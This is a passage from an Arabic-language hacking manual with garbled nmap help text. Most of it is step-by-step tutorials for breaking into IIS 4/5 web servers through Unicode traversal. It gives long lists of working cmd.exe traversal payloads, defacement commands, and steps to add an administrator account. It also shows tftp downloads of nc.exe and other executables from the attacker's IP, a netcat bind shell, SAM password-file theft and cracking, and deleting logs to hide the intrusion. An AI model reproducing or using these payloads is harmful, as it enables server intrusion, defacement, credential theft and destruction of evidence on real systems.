((sS TCP SYN stealth port scan (default if privileged (root- *
(sT TCP connect() port scan (default for unprivileged users-
sU UDP port scan- *
(sP ping scan (Find any reachable machines-
(sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only- *
(sR/-I RPC/Identd scan (use with other scan types-
:(Some Common Options (none are required, most can be combined
O Use TCP/IP fingerprinting to guess remote operating system- *
'p ports to scan. Example range: '1-1024,1080,6666,31337-
F Only scans ports listed in nmap-services-
.v Verbose. Its use is recommended. Use twice for greater effect-
P0 Don't ping hosts (needed to scan http://www.microsoft.com/ and-
(others
Ddecoy_host1,decoy2[,...] Hide scan using many decoys- *
T General timing policy-
n/-R Never do DNS resolution/Always resolve [default: sometimes-
[resolve
oN/-oX/-oG Output normal/XML/grepable scan logs to-
iL Get targets from file; Use '-' for stdin-
S /-e Specify source address or network interface- *
(interactive Go into interactive mode (then press h for help--
Example: nmap -v -sS -O http://www.my.com/ 192.168.0.0/16 '192.88-
'*.*.90
SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND
EXAMPLES
!!!!!!!!! وأيضا يحتوي العديد من الوامر المجهولة
.. الخاص بالبرنامجman page ولخلفية ومعلومات اكثر قم بالذهاب إلى
لنشرح أهم أمر وهو
nmap -sS -O -vv almodammer.com
=الموقع المراد فحصهalmodammer.com
وراح يعرض لك معلومات هائلة تفوق معلومات برامج وأدوات ويندوز
....... منها المنافذ والصدار والملقم والسيرفر
^^^^^^^^^^^^^^^^^^^
=(=(الطريقة السابعة
117
^^^^^^^^^^^^^^^^^^^
تعتمد على وجود جهازك Linuxأو Shell Accountحتى تقدر تطبق اوامر اليونكس في الويندوز لكن
لو تركب Linuxأفضل لن Shellلزم يكون ممتاز وسعره مناسب علشان كذا لتتعب نفسك وركب
Linuxوارتاح
المهم هذا أمر whois
والي يوفره لنا Linuxوالويندوز كبرامج كبيرة وثقيلة وغير دقيقة
ولمعلومات أكثر اضف المر
man whois
-------------------------------------------------------------------
أما عن طريق الويندوز فيمكنك البحث في google
http://www.google.com/search?q=whois&btnG=Google+Search
والكثير من المواقع تقدم هذي الخدمة وهي سكربتات و cgiتقوم بالبحث عن الموقع بإحدى الطرق التي
ذكرتها مع اختلف بسيط وهي شبيهة بموقع netcraftالطريقة الولى..............
انتهى،،،
118
" برنامج عمران سكان للبحث عن الثغرات "
برنامج عمران سكان يعتبر من أفضل برامج كشف الثغرات و ذلك لما يتميز به من سرعه سهولة في تغيير
.ملف الثغرات
119
5لبدء الفحص
6لليقاف
9لمسح شاشه العمليات و النتائج لعاده البحث مره اخرى على ثغرات اخرى
10ال
11منفذ ال
12للخروج
انتهى،،،
120
" الختراق عن طريق اليونيكود )الجزء الول( "
>ةةةةة<
>ةةةةةة<sNiper_hEx :
121
ددددد دددددددددد . -
IIS4.0 / IIS5.0 اليونيكود عبارة عن مجموعة من الثغرات في مجموعة خدمة المعلومات التي ركبت مع
والذي ياتي عادة مع . NT4 / Win2k
122
عليك القيام اول ً بنسخ الملف المراد سحبه الى أي دليل وبعدها يتم كتابة اسم الملف
:في اخر العنوان كالتالي
http://www.xxxx.com/msadc/hEx.mdb
والمر يكون بهذه inetpub\scripts الى مجلد w3svc.exe فنحتاج الى نسخ ملف
الطريقة -:
?http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe
c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\w3svc.exe
،الن نقوم بتصفح الموقع من inetpub\scripts بعد نسخ ملف w3svc.exeالى مجلد
خلل الثغرة بهذه الطريقة -:
\:http://www.xxxx.com/scripts/w3svc.exe?/c+dir+c
الن نستطيع الكتابة داخل أي ملف وبالتحديد الملف الرئيسي للموقع الذي غالبا
مايكون في هذا الدليل
inetpub\wwwroot\index.htmبحيث يكون المر بالشكل التالي -:
http://www.xxxx.com/scripts/w3svc.exe?/c+echo+Hacked+By+sNiper_hEx+hExRay@Hotmail.co
m+>+c:\inetpub\wwwroot\index.htm
دددددد ددددددد ددددددد ددد CMD ددددد ددد ددد ـــ -
ددددددد .
الغرض من نسخ ملف الـ CMDوهو لعطاء امكانية للكتابة داخل السيرفر في بعض الحالت ويتم نسخه
الى مجلد السيكربت بهذه الطريقة -:
?http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe
c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd1.exe
الن بامكاننا استخدام ملف الـ CMDالجديد في الثغرة بدل من الول بهذا الشكل -:
\:http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd1.exe?c+dir+c
123
?http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe
c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd1.exe
الطريقة الثانية بالتعامل مع الملف ssinc.dllوالطريقة كما يلي -: -2
اول انشاء صفحة باسم test.shtml o
تكون هذه الصفحة داخل مجلد wwwroot/hEx/test.shtml o
كتابة هذا الكود داخل الصفحة >! <--"include file="AAAA[...]AA#--بحيث ان o
حرف Aيتم كتابتة حتى يتعدى 2049حرف .
الن يتم طلب الصفحة من خلل المتصفح http://www.xxxx.com/test.shtml o
الن سوف تظهر لك الصفحة . o
الن تستطيع الكتابه وتم تخطي مشكلة الـ . Access Denied o
اذا ظهرت لك صفحة الخطاء رقم 500فمعناها انك لم تقم بتطبيق الطريقة o
بالشكل الصحيح وعليك اعادة المحاولة .
الطريقة الثالثة باستخدام برنامج NC.exeبحيث يتم عمل اب لوود لهذا الملف داخل مجلد -3
الـ Tempفي دليل الويندوز ومنه يتم تنفيذ الوامر من خلل موجة الدوز وللمعلومية مجلد الـ Temp
مفتوح لعمليات الب لوود .
الطريقة الرابعة وهي من خلل عمل كراش للسيرفر باستخدام البرامج اللزمة لهذا -4
الغرض وهذه الطريقة غير مجديه في كثير من الحيان .
البحث عن ملفات root.exe ، sensepost.exe ، shell.exe ، w3svc.exe :ونسخها الى مجلد -5
c:\inetpub\scriptsوتطبيق الثغرة من خللها .
124
hEx@Hotmail.Com -
Get index.html -
Quit -
"msadc/..%c0%af../..%c0%af../winnt/system32/ftp.exe?+"-s:c:\winnt\mspft.ppl/
اذا كان هناك مستخدمين في السيرفر ويوجد لديهم حساب فان معلوماتهم سوف تكون في -
ملف PASSFILT.DLLونستطيع تحديد مسار هذا الملف من خلل الريجستري بواسطة هذا المفتاح -:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\SYSTEM32\PASSFILT.DLL
اذا كان السيرفر يعتمد في القراءة باستخدام صفحات الـ ASPللوصول الى البيانات من -
الـ MySQLفسوف نحتاج الى تطبيق ثغرة ) ( htr.+للوصول الى باسورد خلل قاعدة
المسئول عن هذة القاعده وهي كالتالي -:
http://www.xxxx.com/default.asp+.htr
عند ظهور صفحة الخطا في الوصول الى الصفحة المطلوبة وبالتحديد في سيكربت التنفيذ فالطريقة
صحيحة وماعلينا فقط سوى سحب ملف database.incوقراءة محتوياته للعثور على اسم
المستخدم والباسورد للمسئول عن قاعدة البيانات .
125
c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm/
tftp.exe وهو البرنامج اللزم لعمل الب لوود ويجب ان يكون شغال في حالة تنفيذ المر
""i- وهو بمثابة باراميترز لزوم قراء البيانات في مكتبة الملفات
1.1.1.1 رقم اليبي الخاص بك
GET وهو المر اللزم لطلب الملفات مابين الرسال والستقبال
index.htm اسم الملف بجهازك
\\inetpub\wwwroot اسم الدليل في السيرفر
index.htm اسم الملف على السيرفر
انتهى ،،،
126
>ةةةةة ةة ةةةةةةة ةةةة ةةةةة ةةةةةةةةة<
في الدرس الول كان عبارة عن اوامر اساسية يستطيع الجميع تطبيقها ..اما في هذا الدرس فالمر يتطلب
بعض الذكاء والمهارة ..
البداية :
--------------
عند وجود موقع مصاب بثغرة ما )يونيكود( فان اول شي عليك القيام به هو نسخ مجلد cmdالى cmd1
بهذه الطريقة :
+C+copy+c:\winnt\system32
c:\winnt\system32\cmd1.exeوالسبب هو تفعيل امر الكتابة .. Echo
وبعد ذلك نفذ الثغرة من الملف الجديد ) CMD1.exeهذا شي يعرفه الجميع ( لكن للتذكير فقط !
الن عند تصفحك لملفات الموقع من المتصفح ..من خلل هذه الثغرة فانه سيكون لديك صلحيات
IWAM_USERوهذا المستخدم هو عبارة عن يوزر ينتمي للمجموعه Guestوهو اليوزر المسؤوول
عن تشغيل سيرفر . IIS
وبما انه من مجموعة Guestفهو ل يملك صلحيات كثيرة !! ال اذا تم اعداده بشكل سيء (:
ليوجد شي اكثر ادمانا من محاولة الحصول على رووت (:هذا في انظمة * nixاما في Microsot
فالوضع مختلف (:فإن محاولة الحصول على صلحيات Administratorليس بالسهولة التي تتوقعها (:
فرفع المتيازات بشكل محلي في انظمة مايكروسوفت ممكن فقط بطرق قليلة ل يتعدى عددها اصابع اليد
الواحده ..وانا اكتب هذا الموضوع لشرح كيفية احكام السيطرة على السيرفر والحصول على حساب مكافيء
للمدير (:والتمتع بجميع موارد النظام ..
Sechole - 1وهو اقوى استثمار موجود لرفع المتيازات بشكل محلي ..وطريقة عمله )بشكل مبسط(
بأنه يعتمد على صدع في نواة ويندوز ان تي ..يستطيع من خلله اغتصاب عملية تابعه لمدير النظام يقوم
من خللها برفع امتيازاتك . (:
Tlist - 2تقوم بعرض جميع العمليات التي تعمل بالخلفيه ..والفائده منها هو اقفال الفايروول +النتي
فايروس (:
Kill.exe -3عملها متمم للداة السابقة حيث ستقوم باقفال رقم العملية المستخرج من الداة السابقة .
NCX99 -3نسخه مطورة من الباكدوور NCينصت على المنفذ 99
TFTP32.exe -4لنقل الملفات الى السيرفر ..
127
كل ما سبق كان عبارة عن مقدمه (:اما العمل الحقيقي سيبدأ الن :
سؤال :هل تستطيع الدخول بهذا اليوزر ؟ IWAM_USERالى اي خدمه مثل تلنت او اف تي بي ؟؟
الجابة :ل ..صحيح اننا قمنا برفع امتيزاته لكننا ل نملك كلمه المرور ! لنه تكون مسنده بشكل عشوائي .
سيذهب تفكير البعض الى الحصول على ملف السام وكسره (:هذا ممكن ..لكن يوجد ماهو اسهل .
بما اننا لدينا حساب مكافي لـ Administratorولكننا ل نملك كلمة المرور .ما رأيك بإضافه يوزر جديد
باسمك مع باسورد خاصه بك مع امتيازات المدير ايضا !! (:قليل من الذكاء والتفكير (:
قم بانشاء مستند نصي جديد واضف السطر التالي :
net user Demon pass /add && net localgroup administrators Demon /add
والن Save asواحفظها باسم . add.bat
توضيح :ما فعلناه سابقا هو انشاء مجلد دفعاتي يقوم بانشاء يوزر جديد Demonوكلمة مرور Pass
واضافته الى مجموعة الدمنستريتورز (:المدراء ..
قم الن برفع الملف add.batثم تشغيلها من المتصفح )بواسطة اليونكود(
الن لديك حساب مدير (:وتستطيع الدخول الى اي خدمه ..اف تي بي او تلنت او نت بيوس او غيرها (:
ل تنسى في النهاية مسح الثار واضافة البواب الخلية الخاصة بك لتسهيل الدخول في المرات القادمه (:
طبعا لن اتوسع في هذا الجانب لنه ) لكل شيخ طريقة!( وكل واحد له اسلوب في اخفاء ادواته والتحكم في
الملفات .
128
(:
لذا فان اقفال الفايرول قد يجعل لك اكثر من خيار لسقاط الهدف (:
اسف على النحو الملء ..والتنسيق الـ أي كلم (:واختصار المعلومات ايضا .
بالمكان الستعراض اكثر من ذلك بكثير ..الى درجة الحصول على تحكم رسومي . GUI
لكن لم يكون لدي الوقت الكافي ..اذا وجدت وقت فراغ فسأكتب عن طرق اخرى وادوات اخرى مثل
GEtAdminو Sechole2وكيفية الحصول على تحكم رسومي بواسطه الداة .. WINvnc
انتهى،،،
129
<>ةةةةة
< ةةةة ةةةة:>ةةةةةة
الموضوع يتكلم عن اساليب التحكم في السيرفر عبر اليونيكود مع بعض المتطلبات
: الدوات المطلوبه
130
vti_bin/.._/
%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../wi
\:nnt/system32/cmd.exe?/c+dir+c
\:PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c/
\:PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c/
PBServer/..%%35%63..%%35%63..%/
\:%35%63winnt/system32/cmd.exe?/c+dir+c
PBServer/../
%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
\:+c
\:Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c/
\:Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c/
Rpc/..%%35%63..%%35%63..%/
\:%35%63winnt/system32/cmd.exe?/c+dir+c
Rpc/../
%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
\:+c
vti_bin/..%255c..%255c..%255c..%255c.._/
\:%255c../winnt/system32/cmd.exe?/c+dir+c
vti_bin/..%%35c..%%35c..%%35c..%%35c..%_/
\:%35c../winnt/system32/cmd.exe?/c+dir+c
vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%_/
\:%35%63../winnt/system32/cmd.exe?/c+dir+c
vti_bin/.._/
%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../wi
\:nnt/system32/cmd.exe?/c+dir+c
samples/..%255c..%255c..%255c..%255c..%255c../
\:%255cwinnt/system32/cmd.exe?/c+dir+c
cgi-bin/..%255c..%255c..%255c..%255c..%255c../
\:%255cwinnt/system32/cmd.exe?/c+dir+c
iisadmpwd/..%252f..%252f..%252f..%252f..%252f../
\:%252fwinnt/system32/cmd.exe?/c+dir+c
vti_cnf/..%255c..%255c..%255c..%255c..%255c.._/
\:%255cwinnt/system32/cmd.exe?/c+dir+c
adsamples/..%255c..%255c..%255c..%255c..%255c../
\:%255cwinnt/system32/cmd.exe?/c+dir+c
scripts/..%C1%1C..%C1%1C..%C1%1C../
\:%C1%1Cwinnt/system32/cmd.exe?/c+dir+c
scripts/..%C1%9C..%C1%9C..%C1%9C../
\:%C1%9Cwinnt/system32/cmd.exe?/c+dir+c
scripts/..%C0%AF..%C0%AF..%C0%AF../
\:%C0%AFwinnt/system32/cmd.exe?/c+dir+c
\:scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c/
131
\:scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c/
msadc/..%c0%af../..%c0%af../../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
vti_bin/..%c0%af../..%c0%af../.._/
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
\:scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c/
msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\/
\:%e0\%80\%af../winnt/system32/cmd.exe\?/c+dir+c
cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
samples/..%c0%af..%c0%af..%c0%af..%c0%af../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af.._/
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af.._/
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
adsamples/..%c0%af..%c0%af..%c0%af..%c0%af../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
( معرفة اليونيكود بسيطه جدا يكفي ان تعرف كيف تستطيع النتقال عبر الهارديسكات وعبر الملفات3
( )تعمل عبر المتصفح
scripts]/..%c0%af../..%c0%af../..]/
\:%c0%af../winnt/system32/cmd.exe?/c+dir+C
C:\ لقرائه ما بداخل هارديسك
scripts]/..%c0%af../..%c0%af../..]/
\:%c0%af../winnt/system32/cmd.exe?/c+dir+D
D:\ لقرائه ما بداخل هارديسك
scripts]/..%c0%af../..%c0%af../..]/
\:%c0%af../winnt/system32/cmd.exe?/c+dir+E
E:\ لقرائه ما بداخل هارديسك
132
نقوم بعمل سكان على الموقع لنرى ما به من ثغرات وهنا مثال على ثغرات مبتدأه بالمجلد المطلوب )) اغلب
ثغرات اليونيكود تنطلق من هذه المجلدات ((
اذا كان السيرفر يحوي عدة مواقع فستجدها كل موقع باسمه ) ستجدها في مجلدات بداخل مجلد الـ
( wwwrootاما لو كان السيرفر عباره
عن موقع واحد فقط فستجد كافة الملفات في مجلد الـ wwwrootنفسه
في اغلب الظن يقوم الهاكر بتغيير الصفحة الرئيسيه الولى وعليك ان تعلم انه ليس دائما الصفحة الرئيسيه
الولى تحمل اسم index.htm
هناك عدة تسميات وأختصارات لها وهذه بعضها )) معظمها ((
index.htm
index.asp
default.htm
default.asp
main.htm
main.asp
لنفرض الن اننا وجدنا ان الصفحة الرئيسيه للموقع في مجلدنا wwwrootهي index.htmفكيف
سنقوم بتغييرها وهو ما يهمنا تقريبا من عملية
الختراق هذه
سنقوم اول بتغيير اسم الملف من index.htmالى اي اسم اخر يخطر ببالك وليكن ss.htm
طبعا سنرسل المر عبر ثغرة اليونيكود من المتصفح لديك وسنقوم بتغيير الداله c+dirالى الداله c+ren
)) عليك ان تعرف ان الوامر التي سوتضع هي نفس الوامر الموجوده في Dosوفي Command
Promptفعليك ان تكون عارفا بما هو المر المراد استخدامه
المهم ستكتب الثغره هكذا :
133
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/c+ren+C:\Inetpub\wwwroot\index.ht
m+ss.htm
اول قم بتركيب نظام سيرفر TFTPعلى جهازك ) البرنامج المذكور في اول الموضوع من افضل البرامج
وهناك برنامج اخر اكثر احترافا ولكن هذا يكفي (
الن ضع السيرفر الرئيسي في \ C:لديك
قم بتصميم صفحة خفيفه وسريعه وسمها index.htmوضعها في \C:
وهكذا قمنا بتحميل الصفحة الى النترنت وانتيهنا من عملية الختراق )) تقريبا (( (:
ملحوظه :يمكنك ان تقوم بتحميل ملفات EXEايضا وتشغيلها على السيرفر بنفس السلوب وهذا مثال :
134
لنفرض اننا نريد تحميل ملف EXEعلى السيرفر وسميناه hunter.exeونريد تشغيله فكيف لنا ذلك ؟
سنتبع التي :
نقوم بتحميل الملف على السيرفر كما قمنا بتحميل index.htmونضعه في \ C:للسيرفر عبر هذه التوليفه
:
msadc/..%c1%9c../..%c1%9c../../
%c1%9c../winnt/system32/cmd.exe?/c+tftp.exe+"-
i"+XXX.XXX.XXX.XXX+GET+hunter.exe+C:\hunter.exe
msadc/..%c1%9c../..%c1%9c../..%c1%9c../hunter.exe/
او عن طريق هذا المر
msadc/..%c1%9c../..%c1%9c../../
%c1%9c../winnt/system32/cmd.exe?/c+hunter.exe
الن وقد قاربنا على النتهاء بقي لدينا في السيرفر عمل واحد فقط ال وهو مسح ملفات اللوج *.log
وسيكون ذلك عن طريق هذا المر :
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/c+del+C:\*.log/s
هناك انواع اخرى من الملفات يتم تخزين فيها بعض المعلومات ويفضل مسحها ايضا وهي مثل الملفات ذات
المتداد tmp
وهذا امر مسحها عبر اليونيكود :
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/c+del+C:\*.tmp/s
ايضا ملحوظه مهمه وهي ان ل تبقى اي معلومات عنك في السيرفر كما يفعل البعض بذكر اسمائهم او
ايميلتهم الحقيقيه قم بمسح اي شيء يدل عليك
او على عملية الختراق )) حاول ان تصل الى هذا المستوى ((
هناك عدد من الشياء والفكار لن اتطرق اليها مثل ارسال فايروس ما او امر على ملف batحتى تتمكن من
وضع مشكله كبيره في السيرفر لكي ل يعمل
او ان ترسل فايروس يقوم بمحو جميع ملفات النظام او ان تمرز نفسك لديهم في السيرفر عن طريق برامج
التحكم عن بعد و اخفائها بشكل جيد
في المجلدات ذات الملفات الكثير )) مثل (( system32والكثير الكثير
______________________________________________________________
__________________
ملحوظات :لن تعمل هذه الثغره في كل الحالت فهناك بعض السيرفرات يقومون بقطع الطريق عليك عن
طريق مسح ملف tftpمن سيرفراتهم
)) الملف المسؤول عن ذلك موجود في المجلد (( system32وبعض السيرفرات قامت بعملية الترقيع
)) اصدرت ميكروسوفت ترقيعا لهذه الثغره ((
وبعضهم قد يكون واضع فاير وول يقوم بمراقبة الباكيج الصادر والوارد وقد يقوم بعمل اصطياد لمثل هذه
العمليات
واخرون يقومون بتركيب برنامج الحمايه القوي جدا في نظم IISال وهو Secure IISمن شركة Eeye
والعديد العديد من العقبات ولكن عند كتابة هذا الموضوع )) قبل حوالي اربعة اشهر (( كان ما يقارب %90
من السيرفرات التي فيها نظام IIS
تحوي هذه الثغره وبدون ترقيع )) لعدم وجوده وقتها (( او لهمال المدير.
انتهى،،،
135
" الدليل الكامل لختراق سيرفر " IIS
---------
مقدمة - :
---------
يعلم الجميع مدى انتشار سيرفرات IISحيث تشكل النسبة الكبر المستخدمة في تشغيل مواقع النترنت ..
ويعلم الجميع مدى ضعف الناحية المنية لهذه السيرفرات ..لذا قررت القيام بجمع اشهر ثغرات هذا النوع مع
توضيح كيفية عملها .
---------
ملحظة - :
---------
معظم الطرق الموجودة هنا تعمل على سيرفرات IIS4.0و IIS5.0وجميعها تعتمد على البورت )) 80يعني
من خلل المتصفح(( .
-------------
المتطلبات - :
-------------
CGI-Scanner -1جيد ..أنا افضل ) Whiskerيمكنك تنزيله من هذا الموقع :
( www.wiretrip.net/rfp
-2اكتيف بيرل لتشغيل ملفات البيرل ) يمكنك تنزيله من الموقع :
( /http://www.activestate.com
-3ويب سيرفر )اي نوع( اباتشي او .. IIS
#########################
#########################
#########################
###########
# Game Starts !#
###########
----------------
136
- : IIS Hack.exe
----------------
اكتشف خبراء المن في شركة eEyeثغرة امنية تسمح لك بتحميل نسخه ذكية من nc.exeوجعلها تنصت
على المنفذ .. 80
وهذا سيعطيك سطر اوامر cmde.exeمع امتيازات . Administrator
بامكانك انزال NC.exeو IIS Hack.exeمن الموقع . /http://www.technotronic.com
ويجب تشغيل ويب سيرفر في جهازك قبل تنفيذ الثغرة ..
قم بنسخ اداة nc.exeوضعها في الدليل الرئيسي للويب سيرفر لديك )في اباتشي (Htdocsوفي IIS
الدليل . wwwroot
ثم قم بتشغيل : IISHack.exe
c:\>iishack.exe http://www.target.com/ 80 your_IP/ncx.exe
وبعد اتمام الخطوة السابقة بنجاح :
/c:\>nc http://www.target.comوستجد امامك eGG SheLL
ملحظة :تعمل هذه الثغرة على سيرفرات IIS4.0فقط ))اذا لم يتم تركيب الرقعه(( .
do you want me to explain what to do next, hey common you must be
kidding
....hehe...
-----------------
-: MDAC = RDS
-----------------
اعتقد انها ثغرة قديمة قليل )لكني ما زلت ارى ان %40من المواقع تعاني منها ..
تسمح لك هذه الثغرة بتشغيل اوامرك على النظام الهدف بشكل محلي ..سيتم تشغيل وامرك بصفتك مستخدم
SYSTEMاي بصلحيات مدير النظام ..على العموم اذا اردت معرفة اذا ما كان النظام مصابا بهذه الثغرة
ام ل ..
قم اول بالتصال بالنظام الهدف c:\>nc -nw -w 2 http://www.host.com/ 80 :ثم قم بارسال
المر GET /msadc/msadcs.dll HTTP :
فإذا كان الرد application/x_varg :فهذا يعني ان النظام مصاب )) اذا لم يتم ترقيعه (( ..
بامكانك ايجاد سكربتات بيرل تسهل عليك العمل في هذا الموقع www.wiretrip.net/rfp :
(( mdac.pl - msadc2.pl )) v
c:\> mdac.pl -h host.com
Please type the NT commandline you want to run (cmd /c assumed):\n
cmd /c
إذا اردت تغيير الصفحه الرئيسية ما عليك ال تنفيذ المر echo hacked by me hehe > :
C:\inetpub\wwwroot\index.htm
وإذا أردنا احكام السيطرة على الموقع بامكاننا تحميل Hacker's Swiss knife Armyاقصد
Nc.exeبواسطة هذا المر :
systemroot%&&tftp -i YourIP GET nc.exe&&del ftptmp&& attrib -r%
nc.exe&&nc.exe -l -p 80 -t -e cmd.exe
)) قم بقراءة المر من اليسار الى اليمين لتتمكن من قراءته جيدا ((
بعدها قم بالتصال بالنظام الهدف على المنفذ 80وستجد سطر اوامر مع امتيازات . Administrator
--------------------------------------
-: Codebrws.asp & Showcode.asp
--------------------------------------
الملفان عبارة عن قاريء ملفات ASPيأتي مع IISولكنه ل يأتي محمل افتراضيا بل يجب على مدير النظام
137
تفعيله ..
فإذا كانت هذه الخدمة مفعلة ستسفيد منها كثيرا قهي تسمح لك بقراءة اي ملف )) asp.اعني رؤية
المصدر(( .
باستخدام هذا المر ستحصل على ملف السام )) اذا كان النظام مصابا (( :
_.http://www.victim.com/msadc/samples...nt/repair/sam
بعد الحصول على ملف السام .. Expand it & Crack itباستخدام الداة المفضلة لدي ) LC3.0سيتم
كسرها في اقل من 24ساعه ( .
--------------
- : Null.htw
------------
عملية شرح كيفية عمل هذه الثغرة معقد قليل ..لذا سأكتفي فقط بطريقة الستفادة منها ..
باختصار تسمح لك برؤية السورس كود لي ملف .. ASP
لتنفيذ الثغرة http://www.victim.com/null.htw?CiWe...HiliteType=full :
سيعرض لك هذا الرابط السورس كود الخاص بالصفحه . Default.asp
----------------------
- : webhits.dll & .htw
----------------------
اول قم بتجربة اللنك على النظام الهدف http://www.victim.com/blabla.htw :
فإذا كان الرد بهذه العبارة format of the QUERY_STRING is invalid :فهذا يعني ان النظام
الهدف مصاب بنسبة . %90
اخيرا جرب تنفيذ الثغرة بهذه الطريقة :
www.victim.com/xxxxxxxxx/xxxxxxxx/x...hilitetype=full
مع تغيير الـ XXXXX/XXXXX/XXXX/XXX.htwباحد هذه الملحقات ,وبالتأكيد سيعمل احدها :
iissamples/issamples/oop/qfullhit.htw
iissamples/issamples/oop/qsumrhit.htw
isssamples/exair/search/qfullhit.htw
isssamples/exair/search/qsumrhit.htw
وبالتالي ستحصل على ملف السام قم بكسره بواسطه الداة .. LC3
------------------------------------------------
]-: ASP Alternate Data Streams [::$DATA
------------------------------------------------
هذه الثغرة كانت بدايتها منذ العام .. 1998وهي مخصصة بالتحديد لسيرفرات IIS3.0والن تعمل على
بعض سيرفرات .. IIS4.0
ومهمتها عرض السورس كود لي صفحه )) البعض يتساءل مالفائدة من عرض سورس الصفحه ؟؟ ((
الجابة ان بعض الصفحات تحتوي على معلومات مهمة مثل كلمات مرور قواعد البيانات مثل Global.asa
------------------
- : ASP dot bug
------------------
ربما اقدم ثغرة في هذا النص هي هذه الثغرة حيث تقوم ايضا بعرض السورس كود الخاص بأي صفحه ..
138
حيث تم اكتشافها في العام .. 1997
ويتم تنفيذها من المتصفح بهذا الشكل :
http://www.victim.com/sample.asp.لحظ النقطة الموجودة في اخر السطر
وهي فقط تعمل على سيرفرات . IIS3.0
------------------------------------
- : ISM.DLL Buffer Truncation
------------------------------------
خطأ برمجي يسمح للمهاجم بسحب الملفات ورؤوية السورس كود ايضا ..
وفكرة الثغرة هي التحايل على السيرفر بإيهامه اننا قمنا يطلب ملف ما ..وفي الحقيقة نحن نقوم بطلب ملف
اخر ..
الملف المسؤوول عن هذا الخطأ هو ISM.dllحيث يتم تحميله بعدد كبير من الرموز المسافة )( 20%
. Space
يمكن تنفيذ الثغرة بهذا الشكل :
http://www.victim.com/global.asa%20(...<=230)global.asa.htr
مكان الـ <=230نقوم بوضع 230مسافة بهذا الشكل .. %20
هذا الخطأ يعمل على سيرفرات .. IIS 4.0&5.0ولكن ل يمكن تجربتها على السيرفر اكثر من مره ال اذا
قام بتسجيل خروج وتسجيل دخول ,ويعود السبب في ذلك ان الثغرة السابقة تؤدي الى ايقاف الملف
ISM.dllعن العمل في الذاكرة بينما تطلب الثغرة ان يكون الملف المذكور قيد العمل ..لذا يجب اعادة
تحميل الملف في الذاكرة مره اخرى ..اي بمعنى اخر يجب ان يقوم مدير النظام الهدف بعمل اعادة تشغيل
Rebotاو . Logout & Login
----------
-: htr.+
---------
هذه الثغرة ايضا تقوم بعرض السورس الخاص بملفات . ASP
يمكن استخدامها بهذا الشكل :
http://www.victim.com/global.asa+.htr
-------------
- : site.csc
------------
تمكنك هذه الثغرة من معرفة معلومات مهمة عن الـ DNSالخاص بالموقع بما في ذلك DSN, UID and
.. PASS Database
الثغرة http://www.victim.com/adsamples/config/site.csc :
سيقوم المهاجم بانزال الملف المذكور ..وسيحصل على معلومات قيمة و هامة أيضا .
انتهى،،،
139
